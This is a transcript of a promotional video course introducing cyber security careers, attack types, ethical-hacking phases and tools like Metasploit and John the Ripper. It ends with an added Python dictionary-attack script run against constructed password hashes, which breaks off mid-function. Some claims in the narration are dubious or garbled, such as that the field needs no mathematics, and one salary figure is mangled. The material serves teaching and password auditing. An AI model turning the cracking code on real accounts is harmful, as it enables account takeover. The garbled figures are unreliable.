Transcript for:
Comprehensive Overview of Cyber Security

Did you know that Facebook removed 2.29 billion content pieces from their website after a record number of complaints regarding hacked accounts? Even the mighty Facebook cannot secure its systems 100%. Such is the situation when it comes to cyber security. Based on recent events and future predictions, cyber crimes will cost organizations worldwide a whopping 10.5 trillion dollars, coming from just 3.5 trillion dollars in 2015. So you can understand why it should not come as a surprise that professionals trained in cyber security are in sky-high demand, and will be for the foreseeable future. So what's better than staying ahead of the curve and getting trained in cyber security? Subscribing, of course, since we upload tech-related content every day; hit the bell icon to get notified whenever we drop a new video.

Today's video will be a full course on cyber security for 2023, starting from the basics and going to the advanced topics. We provide a small introduction to cyber security, followed by explainers regarding the career scope in this domain and the job roles offered. After covering a few cyber security skills, we will learn about ethical hacking and network masking techniques like VPNs and proxies. Further, we delve into various attacks like DDoS attacks, SQL injection and cross-site scripting, with live demonstrations that you can carry out on your own system for practice. After learning a bit more about different cyber attacks, we will learn about cryptography, covering topics like encryption, famous algorithms like RSA and AES, and hashing algorithms like SHA-256. Next we look at the Linux-based operating systems that you can use for ethical hacking, like Kali Linux and Parrot Security. We then dive further into some of the tools that cyber security analysts use to secure their systems. Finally, we cover the industry's most well-known certifications, followed by a series of interview questions to prepare you for your first job in cyber security. So let's get started.

Meet Anne. She often shops from www.shoppingcart.com. She has her information, like email ID, address and credit card details, saved on the website to enable a faster and hassle-free shopping experience; the required information is stored in a server. One day Anne received an email which stated her eligibility for a special discount voucher from shoppingcart.com. In order to receive the coupon code, she was asked to fill in her shoppingcart.com account credentials. This didn't seem fishy to her at the time, as she thought it was just an account verification step. Little did she realize the danger she would be facing. She was knocked off her feet when a substantial amount of money was wiped off her account. How do you think this happened? Well, yes, the email she received was fake, and her shoppingcart.com account witnessed unauthorized access from a third party. This type of attack is known as a cyber attack, and the person who carries it out is called a hacker. Could Anne have prevented this attack? Indeed she could have, with the help of cyber security. Cyber security involves techniques that help in securing various digital components, networks, data and computer systems from unauthorized digital access. There are multiple ways to implement cyber security, depending on the kind of network you are connected to and the type of cyber attacks you are prone to. So let's take a look at the various cyber attacks that Anne could have been exposed to.

One of the most common types of cyber attacks is a malware attack, like Trojans, adware and spyware, to name a few. Had Anne downloaded any suspicious attachments online, her system could have gotten corrupted by malicious viruses embedded within the attachments. Next is a phishing attack, the type of cyber attack which Anne experienced. Here the hacker usually sends fraudulent emails which appear to be coming from a legitimate source. This is done to install malware or to steal sensitive data like credit card information and login credentials. Another type of attack is the man-in-the-middle attack. Here the hacker gains access to the information path between Anne's device and the website's server. The hacker's computer takes over Anne's IP address; by doing so, the communication line between Anne and the website is secretly intercepted. This commonly happens with unsecured Wi-Fi networks and also through malware. A password attack is one of the easiest ways to hack a system. Here Anne's password could have been cracked by using either common passwords or trying all possible alphabetical combinations.

To prevent future cyber attacks, Anne sought to implement a few cyber security practices. First, she installed a firewall. As the name suggests, it is a virtual wall between Anne's computer and the internet. Firewalls filter the incoming and outgoing traffic from your device to safeguard your network, and they can either be software applications or hardware reinforcements. Secondly, Anne implemented honeypots. Just like how flowers attract bees, dummy computer systems called honeypots are used to attract attackers. These systems are made to look vulnerable in order to deceive attackers, and this in turn defends the real system. In addition to these, she also decided to use unique alphanumeric passwords and antivirus software, and started avoiding mails from unknown senders.

That was Anne's story. Cyber attacks are not just confined to individuals but also to public and private organizations. Cyber attacks carried out in such places are more deadly, and they result in colossal losses. The motives of such attacks are many, starting from tampering with crucial data to monetary gains. Let's have a look at a few of the cyber attacks that companies are subjected to. Various public sector organizations and large corporations face the advanced persistent threat (APT). In this form of attack, hackers gain access to networks for a prolonged period in order to continuously gain confidential information. Companies also witness the denial of service attack, where networks are flooded with traffic, which in turn leaves legitimate service requests unattended. A variant of this is the distributed denial of service (DDoS) attack, when multiple systems are used to launch the attack. When a hacker manipulates a standard SQL query in a database-driven website, it is known as a SQL injection attack. By doing so, hackers can view, edit and delete tables from databases.

Amidst a plethora of cyber attacks, it is indeed a challenge for organizations with several networks and servers to ensure complete security. This is not an easy task, and to help with this, cyber security professionals are hired to work on identifying cyber threats and securing a company's network. There are multiple job roles in the field of cyber security. If hacking fascinates you, then the role of an ethical hacker is something to be explored. Such professionals try to exploit a network's vulnerabilities just like how a hacker would do, but only to identify those vulnerabilities and resolve them for protection against an actual cyber attack. But if you are looking to design robust security structures, then the role of a security architect is more apt. A chief information security officer (CISO) plays a crucial role in enterprise security and is entrusted with the overall safety of the information in an organization.

Now there are several reasons as to why you should learn cyber security. Here we have the top 10 reasons for the same.

At number 10, the reason we have is basic requirements. There is a wrong notion that building a career in cyber security is daunting. Well, it is not. A fancy college degree is not at all what it takes to become a successful cyber security professional. You can venture into the domain of cyber security with some basic knowledge of IT and with an authorized cyber security certification. The overall eligibility criterion for the cyber security domain is relaxing across the world. IT professionals with cyber security certifications are known to receive higher salary packages. Certifications are always given extra weightage in the infosec field, and they open doors to bigger opportunities. These cyber security certifications can be opted for by anyone, as the eligibility for these is very basic. Cyber security certifications train professionals and thus help in bridging the gap between the supply and demand of skilled cyber security professionals. So don't take a step back from learning cyber security thinking it is a tedious process. Whether you are a fresher or a professional, you can go ahead with just these basic requirements.

Before moving on to our next reason, here is a question for you all: how many of you like mathematics? Please let us know in the comment section below. I'm sure not everyone loves mathematics, and that is completely okay when it comes to learning cyber security. Our ninth reason is that mathematics is not a concern for learning cyber security. Many of us find mathematics challenging; some have the aptitude for dealing with numbers and some don't, and those who don't find it difficult to proceed with a career that has maths involved. However, you can take your decision without any worries when it comes to cyber security, as the domain of cyber security does not involve mathematics. So if maths is not your strong point, then choosing to learn cyber security is a great choice. This can definitely be a relief to many. Instead, you can get acquainted with networking, network security control and coding to build a career in cyber security.

Our eighth reason is that cyber security is a profession that helps achieve the greater good. Cyber security consists of a set of measures and approaches that help protect companies' and individuals' data from being compromised and stolen. Cyber security professionals have defended organizations from several deadly cyber attacks that aimed at jeopardizing an organization's confidentiality, integrity and availability. Cyber crimes are currently on the rise, and with the different types of cyber attacks, the threat to organizations and individuals alike is only growing by the day.
government agencies police forces and cyber crime cells are tackling this threat however there is more requirement for skilled cyber security professionals who can protect data and work for the greater good therefore if you want to bring about a positive impact and a meaningful difference to the society we live in then learning cyber security is a great choice our seventh reason is that you get to travel the world who doesn't love to travel the globe learning cyber security is a great reason especially for those of you who aspire to travel the world with the lack of cyber Security Professionals in the world there are plenty of opportunities for skilled experts to travel overseas to Showcase their cyber security skills which are in high demand The increased demand for cyber Security Professionals is not just restricted to one area but to the entire world there are several employment opportunities for cyber Security Professionals across the globe so learning cyber security can open new doors for you overseas as well our sixth reason is very interesting and that is the fact that you get to work with secret agencies and high profile ones like other professionals cyber Security Professionals also have the opportunity to work with several prestigious multinational companies and big giants like Google Dell Accenture and others however a cyber security professional's career opportunities can go beyond mncs and they might get the opportunity to work with top government secret agencies like mosad NSA Nia FBI and so on so what are you waiting for become a cyber security expert and showcase your skills to grab the chance to work with these top agencies our fifth reason is it is never too late to begin with there are very few professions that give you the Liberty to begin late and one such profession is cyber security it is never too late to realize that you want to become a cyber security expert many people work as cyber Security Professionals even after the retirement if they 
have a good knowledge about it you could also join cyber security courses that train you irrespective of your age as long as you have good cyber security skills there is no need to worry about job security however late it is our fourth reason is cyber security is an evergreen industry cyber security has gradually become an evergreen industry in the current times with the onset of the covid-19 pandemic businesses are moving online and shifting to cloud storage the demand for cyber security is at its peak there is a high demand for cyber Security Experts who can Safeguard Digital Data hence we can be rest assured that cyber security is here to stay and this domain is only going to grow in the coming years according to cyber security Ventures the number of Internet users will hit a whopping 6 billion by 2022. these numbers speak volumes and this reveals the growing demand for cyber Security Professionals across the globe digitalization is taking place across several Industries a cyber security expert finds opportunities in every field as every organization wants to be secure on the digital front so now is the right time if you are looking to learn and start a career in cyber security before moving to our top three reasons to learn cyber security here are some crucial information for you all as you know with relevant certifications you can grow your cyber security career and here we are to help you with that you can check out Simply loans cyber security export Masters program to equip you with the necessary skills to become an expert in this rapidly growing domain training for highly sought after certifications like CompTIA Security Plus CH cism and cissp is at the Forefront of this course preparing you for the industry's best jobs so what are you waiting for get certified with simply learn and grow your career in cyber security today so our third reason to learn cyber security is because of the plenty of job opportunities it offers according to the U.S Bureau of Labor 
Statistics the employment of information security analyst is projected to grow 33 percent from 2020 to 2030 much faster than the average for all occupations with the world turning digital there is a dire need for companies to hire cyber Security Experts who can protect and Safeguard sensitive data as firms work to improve their cyber security structure they are also hiring several cyber security exports to design Implement and maintain the Cyber Security Solutions cyber security jobs are not limited to the it domain many security positions are found at companies outside of it including Industries like Media Sports or Finance to name a few this emphasizes on the fact that cyber security export is exposed to several job opportunities from different types of companies across the globe our second reason for you to learn cyber security is the good salary package it offers salaries play a crucial part in any job that you undertake isn't it every individual likes to get duly rewarded for their work and cyber security is one such domain that provides fat paychecks cyber security exports are the individuals who have come to the rescue with the unprecedented rise in cyber crimes across the world organizations are willing to pay Sky High salaries for these cyber security exports there is a lack of skilled cyber Security Professionals and this is another reason cyber Security Experts are paid well the salaries of cyber Security Professionals are still expected to grow in the coming times owing to the high demand salaries and cyber security have a high growth potential and if you are a skilled cyber security professional you can always negotiate your salary finally a top reason to learn cyber security is that you will have a job that never gets boring and a domain that offers unlimited potential for personal growth several times individuals find themselves lost in their career due to lack of challenges due to their mundane work and also due to stagnation at work these reasons 
play a major role when it comes to a professional quitting their job however a job role in cyber security tackles these reasons to an extent and that is why we have this reason at number one cyber security is a domain that is constantly evolving and so are the nature of cyber attacks hackers are always trying to develop new methods to get to your data they develop new exploits regularly and hence as a cyber security professional you will face interesting challenges to find Optimal Solutions for new exploits you will have new puzzles to solve a cyber security career is not going to be stale along with failures you will also be exposed to new and interesting discoveries to keep yourself updated in this field and to tackle cyber attacks you should be in a position to outsmart the hackers being in the field of cyber security allows you to constantly upskill and enhance your knowledge and experience it also ensures that your Learning Journey will never stop with the world churning virtual cyber attacks are constantly flooding new headlines covid-19 accelerated the current digital transformation in the year 2020 witnessed several data breaches since technology has become more intertwined with our daily lives it is no surprise that the need for skilled cyber Security Professionals is increasing on that note hey everyone welcome yet to another exciting video by simply learn which will take you through the top cyber security career options available today but before we begin if you're new here and haven't subscribed already make sure to hit the Subscribe button and that Bell icon for interesting Tech videos every day there is a significant lack of skilled cyber security professionals who can tackle the cyber security challenges faced daily hence a career in cyber security is demanding and equally rewarding finding the right career path in the cyber security industry isn't always easy here we are here to help you with that there are a few prerequisites for a career in cyber 
security the basic one being a bachelor's degree in a subject relating to cyber security however if you don't have a relevant degree you can always take up relevant cyber security certifications and kick-start your cyber security Journey a few other skills like networking knowledge of operating systems and Cloud security are required to start and grow your cyber security career you can check out our video on the top 5 cyber security skills to know more cyber security jobs vary from entry level to Executive management and everything in between there are several cyber security paths available today it is best if you start with entry level and then move on to the next level with the help of certifications and relevant experience here let us have a look at the top 5 cyber security job rules today the first job role is that of a network engineer Network Engineers construct and administer a company's computer networks they are responsible for installing configuring and supporting Network equipment they also configure and maintain firewalls switches and routers this entry-level cyber security job can help you start your journey to become an ethical hacker the annual average salary of a network engineer in the US is 85 098 dollars and in India it is around 510 000 rupees second on our list is information security analyst as an information security analyst your primary duty is to protect sensitive information information security analysts create and Implement plans for preventing cyber attacks they monitor data access and ensure compliance with policies depending on the Cyber threat they decide if it has to be resolved or escalated further in the U.S an information security analyst earns eight to nine thousand and one hundred forty dollars annually and in India they earn 6 lakh 42 and 756 rupees third on our list is ethical hacker they are also known as penetration testers they are Network Security Consultants who identify and exploit system vulnerabilities just like how a 
hacker would do vape probe and test and network using various penetration tools and software they also design new penetration tools and document the test results in the US a certified ethical hacker earns around ninety three thousand dollars on an annual average basis and in India they make around 5 lakh rupees the fourth job role that we are going to talk about is security architect security Architects research and plan the security elements for their organizations they design robust security structures that are capable of preventing malware attacks a security architect approves the installation of routers VPN and firewalls their duties go beyond just architecture building and including formulating company procedures guidelines and user guides security architects in the US make a handsome sum of 124 thousand dollars a year on an average and in India they make nearly 21 lakh 80 000 rupees and finally fifth on our list is Chief Information Security Officer ciso they are senior level officers in an organization they ensure the safety of the information they develop Implement and maintain information security and risk management programs they also interact with stakeholders and regularly brief them with information security concerns the average annual salary of a chief information security officer in the states is a whopping 165 thousand dollars annually and in India it is 22 lakh 22 and 845 rupees several companies are looking for skilled cyber Security Professionals Philips Siemens Google Microsoft and GE to name a few with passion the right amount of experience and relevant certifications you can grow your cyber security career you can check out Simply learned cyber security expert Masters program to equip you with the necessary skills needed to become an expert in this rapidly growing domain this course will help you learn various methods as to how you can protect your infrastructure secure your data run risk analysis achieve compliance and much more according to 
cybercrime magazine by cyber security Ventures globally there would be nearly 3.5 million unfilled cyber security jobs by 2021 and the number of Internet users will hit a whopping 6 billion by 2022. these numbers speak volumes and this shows the growing demand for cyber Security Professionals across the globe now that you know the high demand for cyber Security Professionals let us help you start your cyber security career by bagging the right skill set many of you out there might be waiting to become a cyber security professional but are unsure of how to go about it and what skills you would need to get a cyber security job not to worry we are here to help you with that after extensive research we have come up with the top 5 skills that will help you get into the field of cyber security let's have a look at these skills individually first we have networking and system administration the number one skill you need to have to enter the field of cyber security is computer networking networking is the backbone of the internet it is imperative that you have an in-depth understanding of networking to start a career in cyber security a network is a group of interconnected devices and networking is the art of understanding how data is sent transmitted and received amongst these devices you need to know various routing protocols the TCP and OSI models govern networking The OSI model is comparatively newer basically in these models all the protocols are grouped into layers and work together to help you receive data on your device sent from a server learning networking will help you understand the technical aspects of data transmission which will help you secure your data you can take up networking certifications like Security Plus and Cisco CCNA to gain a strong networking Foundation another skill that will be beneficial for you is to Master System Administration if you think about it all of us are CIS admins at some level system administration is all about configuring and 
maintaining computers you must be curious to know every aspect of your computer features and settings and play around a bit carry out a trial and error method and give yourself small tasks like recovering deleted files or monitoring old viruses on a VM explore new techniques put them into use and expand your knowledge let us now move on to our second skill knowledge of operating systems and virtual machines to become a cyber security professional you need to have a strong knowledge of operating environments such as Windows Linux and Mac OS cyber Security Professionals largely use Linux and it comes with several tools to learn operating systems go ahead and set up and use Virtual machines that is VMS and play around with them this will help you gain hands-on experience as a cyber security expert you should be comfortable working on any OS VMS allow you to train and research in an isolated environment and help you maximize your skills the next point to remember is to know Kali Linux it is the most widely known Linux distribution for ethical hacking and penetration testing it comes with several hundred tools related to penetration testing malware analysis security research computer forensics and so on Kali contains several projects and you can learn a lot another good thing about Kali is that it is free to use so what are you waiting for download and start right away remember that Linux is the backbone of cyber security and a commonly asked topic for cyber security interviews especially for pen testing roles moving on to our third skill our third skill is network security control it is another basic skill that every cyber security professional should have network security control refers to the different measures which are employed to enhance the security of a network it is simple you can only Safeguard your network if you know how it works how routers firewalls and other devices work a firewall is a hardware or software that blocks incoming or outgoing traffic from 
the internet to your computer firewalls are required to secure a network as a cyber security expert you must be able to leverage a firewall to filter and prevent unauthorized traffic onto the network in addition to that as a cyber security expert you must know about intrusion detection systems intuition prevention systems virtual private networks and remote access and intrusion detection system IDs is designed to detect unauthorized access to a system it is used together with a firewall and a router you should be able to operate the IDS and recognize any security policy violations and malicious traffic on the network as many of you may have used a VPN is a connection between a VPN server and a VPN client it is a secure tunnel across the internet moving on next up we have an interesting skill any idea what that is if yes boss and leave a comment as to what you think the next skill will be if getting your learning started is half the battle what if you could do that for free visit scale up by simply learn click on the link in the description to know more and before we jump into this skill if you find this video interesting make sure to give it a thumbs up fourth skill on our list is coding so you might be wondering if coding is really required to become a cyber security professional well it is true that not all cyber Security Professionals have or need coding skills however having zero coding knowledge May limit your opportunities in the future knowing a couple of programming languages will help you identify the plan behind an attack and defend against deadly hacking techniques so as seen on your screens these are the best programming languages to learn to make your cyber security career worthwhile we have C and C plus plus the C programming language is the backbone of most operating systems C and C plus plus are low level programming languages that you need to know as a cyber security professional on the other hand python is a high level programming language that is 
becoming popular among cyber Security Experts today knowing python will give you an upper hand in your career it will help you identify and fix vulnerabilities JavaScript is another high level programming language that adds interactivity to web pages a good advantage of knowing JavaScript is that you can prevent cross-site scripting attacks from occurring as in these attacks the attacker implants malicious code in a web application speaking of PHP because most of the websites are created using PHP learning it will help you defend against intruders similarly HTML is another language cyber Security Professionals should understand as most websites use it and it is one of the easiest languages to learn another programming language that you can use is golang it is great for cryptography you can solve various cyber security problems with it then we have SQL that is structured query language attackers use this language to damage the stored data one such example is the SQL injection attack hence having a good understanding of SQL will be highly beneficial another Point we'd like to highlight is to have knowledge of Assembly Language this will help you become a cyber security engineer assembly will help you understand how malware functions and thereby help you defend against it in the cyber security domain you can't just lock into a single language and hence it is advised that you are acquainted with a couple of them you can also do a crash course with these languages and learn them hence determine the best programming language for your cyber security role and get familiar with the basics moving on our fifth skill on the list is cloud security there is a growing demand for cyber Security Professionals with Cloud security skills in the coming years companies are on the lookout for professionals with security skills applicable to public and hybrid Cloud platforms such as Amazon web services and Azure more organizations look to Cloud infrastructure to store data and run 
applications this includes implementation of policies and technologies that protect cloud-based systems and devices just like application development security Cloud security also involves building secure systems from the start companies want professionals who can manage the cloud security tools to identify and prevent any Cloud breaches people with experience and knowledge in managing big platforms such as Microsoft Azure AWS and the gcp are in high demand now that we have seen the top 5 cyber security skills let us go through a set of additional skills that can help you get into the cyber security field remember that to become a successful cyber security expert you must possess a rich and diverse skill set so in a list of additional skills first we have risk analysis identifying risks even before their arrival is a great skill cyber Security Professionals are required to identify manage and mitigate risks risk management and mitigation is a skill set that is going to be highly in demand in the coming years next we have information security companies require skilled professionals who can protect their electronic data from unauthorized taxes here in demand skills are authentication authorization malware analysis and data recovery next on our list is security incident handling and response as a cyber security expert you must be prepared to handle any forthcoming threat of violating an organization security policy by following an updated incident response plan your team can proactively protect your data and minimize the damages in security Incident Management you are required to identify manage record and analyze security threats in real time a security incident can be an active threat or a successful compromise of data or an attempted intrusion it can also be incidents like DDOS attacks fishing apt's ransomware and many more another important pointer is that as a security practitioner you must also manage and analyze the security information and even management Siem 
tools and services.

Moving on, we have security audit. A security audit is an internal check that is carried out to find flaws in the organization's information system. You must be able to conduct a review of the organization's adherence to regulatory guidelines. Security audit and compliance knowledge are very crucial, as any lapse in regulatory compliance could lead to hefty penalties. Soon organizations will need people who are more familiar with the various data privacy regulations. If you are good at paperwork you can capitalize on this skill: companies will need people who can understand what paperwork to file and which security protocols to use to comply with the regulations.

Finally we have laws and regulations, an often overlooked cyber security aspect. There are several cyber security laws and regulations, and if you break these laws, intentionally or not, it doesn't matter, as you will still be charged. These laws define how you can use the internet and how people can be protected from becoming victims of cyber crime. Knowing these laws and regulations and following best practice will make you ethical at your job, which in turn will be good for your organization.

So those were our additional skills. Apart from these, make sure you stay updated with new hacks and learn new tools, as cyber security is ever evolving. Another important skill apart from these technical skills is your soft skills; a good set of soft skills will help you bag your dream job. We have a video on the top 5 soft skills that will help you grow in your career, so do watch that and incorporate those skills as well.

We humans are highly tech savvy in today's times. With the extensive use of the internet and modern technologies, there is a massive challenge in protecting all our digital data, such as net banking information, account credentials and medical reports, to name a few. Have you heard about the deadly WannaCry ransomware attack? The attack happened in May 2017 in
Asia and then spread across the world within a day. More than 230,000 computers were infected across 150 countries. The WannaCry cryptoworm encrypted the data and locked users out of their systems; for decryption of the data, users were asked for a ransom of $300 to $600 in Bitcoin. Users who ran unsupported versions of Microsoft Windows and those who hadn't installed the security update of April 2017 were targeted in this attack. The WannaCry attack took a toll on every sector: top-tier organizations like Hitachi, Nissan and FedEx had to put their businesses on hold as their systems were affected too. Now this is what you call a cyber attack, and to prevent such attacks, cyber security is implemented.

We can define cyber security as the practice of protecting networks, programs, computer systems and their components from unauthorized digital attacks. These illegal attacks are often referred to as hacking. Hacking refers to exploiting weaknesses in a computer network to obtain unauthorized access to information, and a hacker is a person who tries to hack into computer systems. It is a misconception that hacking is always wrong; there are hackers who work with different motives. Let's have a look at three different types of hackers.

Black hat hackers are individuals who illegally hack into a system for monetary gain. On the contrary, we have white hat hackers, who exploit the vulnerabilities in a system by hacking into it with permission in order to defend the organization. This form of hacking is absolutely legal and ethical, hence they are also often referred to as ethical hackers. In addition to these hackers we also have the gray hat hackers; as the name suggests, the color gray is a blend of both white and black. These hackers discover vulnerabilities in a system and report them to the system's owner, which is a good act, but they do this without seeking the owner's approval. Sometimes gray hat hackers also ask for money in return for the spotted vulnerabilities. Now that you
have seen the different types of hackers, let's understand more about the hacking that is legal and valid, ethical hacking, through an interesting story.

Dan runs a trading company; he does online trading with the money his customers invest. Everything was going well and Dan's business was booming until a hacker decided to hack the company's servers. The hacker stole the credentials of various trading accounts and asked for a lump sum ransom in exchange for the stolen credentials. Dan took the hacker's words lightly and didn't pay the hacker. As a result, the hacker withdrew money from various customers' accounts, and Dan was liable to pay back the customers. Dan lost a lot of money and also the trust of his customers.

After this incident, Dan gave a lot of thought to what could have gone wrong with the security infrastructure in his company. He wished there was someone in his company who could have run a test attack to see how vulnerable the systems were before the hacker penetrated the network. This was when he realized he needed an employee who thinks like a hacker and identifies the vulnerabilities in his network before an outsider does. To do this job he hired an ethical hacker, John. John was a skilled professional who worked precisely like a hacker; in no time he spotted several vulnerabilities in Dan's organization and closed all the loopholes. Hiring an ethical hacker helped Dan protect his customers from further attacks in the future, which in turn increased the company's productivity and guarded the company's reputation.

So now you know hacking is not always bad. John in this scenario exposed the vulnerabilities in the existing network, and such hacking is known as ethical hacking. Ethical hacking is divided into six different phases; let us look at these phases step by step with respect to how John, our ethical hacker, will act. Before launching an attack, the first step John takes is to gather all the necessary information about the organization's system that he intends to
attack. This step is called reconnaissance; he uses tools like Nmap and hping for this purpose. John then tries to spot the vulnerabilities, if any, in the target system using tools like Nmap and Nexpose. This is the scanning phase. Now that he has located the vulnerabilities, he tries to exploit them; this step is known as gaining access. After John makes his way through the organization's networks, he tries to maintain his access for future attacks by installing backdoors in the target system. The Metasploit tool helps him with this. This phase is called maintaining access. John is a brilliant hacker, hence he tries his best not to leave any evidence of his attack; this is the fifth phase, clearing tracks. We now have the last phase, that is, reporting. In this phase John documents a summary of his entire attack: the vulnerabilities he spotted, the tools he used and the success rate of the attack. Looking into the report, Dan is now able to take a call on how to protect his organization from external cyber attacks. Don't you all think John is an asset to any organization?

If you want to become an ethical hacker like John, then there are a few skills that you need to acquire. First and foremost, you need to have good knowledge of operating environments such as Windows, Linux, Unix and Macintosh. You must have reasonably good knowledge of programming languages such as HTML, PHP, Python, SQL and JavaScript. Networking is the base of ethical hacking, hence you should be good at it. Ethical hackers should be well aware of security laws so that they don't misuse their skills. Finally, you must have a global certification in ethical hacking to successfully bag a position as an ethical hacker like John. A few examples of ethical hacking certifications are the Certified Ethical Hacker (CEH) certification, CompTIA PenTest+ and the Licensed Penetration Tester certification, to name a few. Simplilearn provides a Cyber Security Expert master's program that will equip you with all the skills required by a cyber
security expert.

When it comes to web app hacking, it generally refers to the exploitation of applications via HTTP, which can be done by manipulating the application through its graphical user interface, by tampering with the Uniform Resource Identifier (URI), or by tampering directly with HTTP elements that are not part of the URI. The hacker can send a link via an email or a chat and may trick the users of a web application into executing actions; in case the attack is on an administrator account, the entire web application can be compromised.

Anyone who uses a computer connected to the internet is susceptible to the threats that computer hackers and online predators pose. These online villains typically use phishing scams, spam email or instant messages and bogus websites to deliver dangerous malware to your computer and compromise its security. Computer hackers can also try to access your computer and private information directly if you are not protected by a firewall; they can monitor your conversations or peruse the back end of your personal website. Usually disguised with a bogus identity, predators can lure you into revealing sensitive personal and financial information.

A web server can refer to the hardware, the computer, or the software which helps to deliver content that can be accessed through the internet. The primary function of a web server is to deliver web pages on request to clients using the Hypertext Transfer Protocol (HTTP). Hackers attack web servers to steal credential information, passwords and business information by using different types of attacks like DDoS attacks, SYN flooding, ping floods, port scans and social engineering attacks. In the area of web security, despite strong encryption on the browser-server channel, web users still have no assurance about what happens at the other end.

Although wireless networks offer great flexibility, they have their own security problems. A hacker can sniff
the network packets without having to be in the same building where the network is located; as wireless networks communicate through radio waves, a hacker can easily sniff the network from a nearby location. Most attackers use network sniffing to find the SSID and hack a wireless network. An attacker can attack a network from a distance, and therefore it is sometimes difficult to collect evidence against the main hacker.

Social engineering is the art of manipulating users of a computing system into revealing confidential information which can later be used to gain unauthorized access to a computer system. The term can also include activities such as exploiting human kindness, greed and curiosity to gain access to restricted-access buildings or getting users to install backdoor software. Knowing the tricks used by hackers to trick users into releasing vital login information is fundamental to protecting computer systems.

Coming to our main focus for today, let us have a look at the top 5 most essential ethical hacking tools to be used in 2021. At the top of the chain lies Nmap. Nmap, which stands for Network Mapper, is a free and open source utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules and monitoring host or service uptime. It is most beneficial in the early stages of ethical hacking, where a hacker must figure out the possible entry points to a system before running the necessary exploits, thus allowing the hacker to leverage any insecure openings and breach the device. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services they are running, what operating systems are installed, what type of packet filters and firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks but works fine against single hosts as well. Since every application that connects
to a network needs to do so via a port, the wrong port or server configuration can open a can of worms which leads to a thorough breach of the system and ultimately a fully hacked device.

Next on our list we have Metasploit. The Metasploit Framework is a very powerful tool that can be used by cyber criminals as well as ethical hackers to probe systematic vulnerabilities on both networks and servers. Because it's an open source framework, it can be easily customized and used with most operating systems. With Metasploit, the ethical hacking team can use ready-made or custom code and introduce it into a network to probe for weak spots, as another flavor of threat hunting. Once the flaws are identified and documented, the information can be used to address systemic weaknesses and prioritize solutions. Once a particular vulnerability is identified and the necessary exploit is delivered to the system, there are a host of options for the hacker; depending on the vulnerability, hackers can even run root commands from the terminal, allowing complete control over the activities of the compromised system as well as all the personal data stored on the device. A big advantage of Metasploit is the ability to run full-fledged scans on the target system, which gives a detailed picture of the security index of the system along with the necessary exploits that can be used to bypass antivirus software. Having a single solution to gather almost all the necessary points of attack is very useful for ethical hackers and penetration testers, as denoted by its high rank in the list.

Moving on, we have the Acunetix framework. Acunetix is an end-to-end web security scanner which offers a 360-degree view of an organization's security. It is an application security testing tool that helps the company address vulnerabilities across all their critical web assets. The need to be able to test applications in depth, further than traditional vulnerability management tools, has created a market with several players in
the application security space. Acunetix can detect over 7,000 vulnerabilities, including SQL injections, cross-site scripting, misconfigurations, weak passwords, exposed databases and other out-of-band vulnerabilities. It can scan all pages, web apps and complex web applications running HTML5 and JavaScript as well. It also lets you scan complex multi-level forms and even password-protected areas of the site. Acunetix is a dynamic application security testing package, which has definite perks over static application security testing frameworks, also known as SAST scanners. SAST tools only work during development and only for specific languages, and have a history of reporting a lot of false positives, whereas dynamic testing tools, also known as DAST, have the ability to streamline testing from development to deployment with minimal issues.

Next on our list we have airgeddon. This is a multi-use bash script for Linux systems used to hack and audit wireless networks like our everyday Wi-Fi router and its counterparts, along with being able to launch denial of service attacks on compromised networks. This multipurpose Wi-Fi hacking tool has very rich features which support multiple methods for Wi-Fi hacking, including WPS hacking modes, WEP attacks, handshake captures, evil twin and so much more. It usually needs an external network adapter that supports monitor mode, which is necessary to be able to capture wireless traffic that traverses the air channels. Thanks to its open source nature, airgeddon can be used with multiple community plugins and add-ons, thereby increasing its effectiveness against a wide variety of routers, both in the 2.4 GHz and the 5 GHz band.

Finally, at number 5 we have John the Ripper. John the Ripper is an open source password security auditing and password recovery tool which is available for many operating systems. John the Ripper Jumbo supports hundreds of hash and cipher types, including those for user passwords of operating systems, web apps, database
servers, encrypted keys and document files. Some of the key features of the tool include offering multiple modes to speed up password cracking, automatically detecting the hashing algorithm used by the passwords, and the ease of running and configuring the tool to make password cracking easier. It can use dictionary attacks along with regular brute forcing to speed up the process of cracking the correct password without wasting additional resources. The wordlists used in these dictionary attacks can be supplied by the users, allowing for a completely customizable process.

We also have a few honorary mentions in our list that just missed the cut. Netsparker, for instance, is an automated yet fully configurable web application security scanner that enables you to scan websites, web applications and web services. The scanning technology is designed to help you secure web applications easily without any fuss, so you can focus on fixing the reported vulnerabilities. Burp Suite Professional is one of the most popular penetration testing and vulnerability finder tools and is used for checking web application security. Burp, as it is commonly known, is a proxy-based tool which is used to evaluate the security of web-based applications and to do hands-on testing. Moving away from websites and applications, Wireshark is a free and open source packet analyzer which was launched in 2006.
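To make the dictionary attack described above concrete from the auditor's side, here is an added Python example; it is not code from the video or from John the Ripper. It runs one constructed wordlist against a constructed set of three accounts stored two ways, unsalted SHA-256 and per-user salted PBKDF2, and reports which accounts fall and how much hashing work each storage scheme forces on the auditor. The account names, passwords, salts and iteration count are all assumptions made up for the demo.

```python
import hashlib
import hmac

# Constructed sample data for the demo: a short wordlist of the kind an auditor feeds to
# John the Ripper, and three accounts. Nothing here is real leaked material.
WORDLIST = ["letmein", "password", "summer2023", "qwerty", "dragon"]
PASSWORDS = {"alice": "password", "bob": "summer2023", "carol": "pink-walrus-lattice-74"}
ITERATIONS = 1_000   # kept small for the demo; production deployments use far more


def fast_unsalted(password: str) -> str:
    # The weak storage scheme: one fast hash, no salt, so equal passwords give equal hashes.
    return hashlib.sha256(password.encode()).hexdigest()


def salted_slow(password: str, salt: bytes, iterations: int = ITERATIONS) -> bytes:
    # The hardened scheme: a per-user salt plus an iterated key derivation function.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)


def build_stores():
    """Return the same accounts stored both ways. Salts are derived from the user name only
    so the demo is repeatable; a real system draws them from os.urandom()."""
    unsalted = {user: fast_unsalted(pw) for user, pw in PASSWORDS.items()}
    salted = {}
    for user, pw in PASSWORDS.items():
        salt = hashlib.sha256(f"demo-salt-{user}".encode()).digest()[:16]
        salted[user] = (salt, salted_slow(pw, salt))
    return unsalted, salted


def audit_unsalted(store, wordlist):
    """Dictionary audit of unsalted hashes. Every word is hashed once and the digest is
    looked up for all accounts at the same time, so the cost is one hash per word."""
    table = {fast_unsalted(word): word for word in wordlist}
    cracked = {user: table[digest] for user, digest in store.items() if digest in table}
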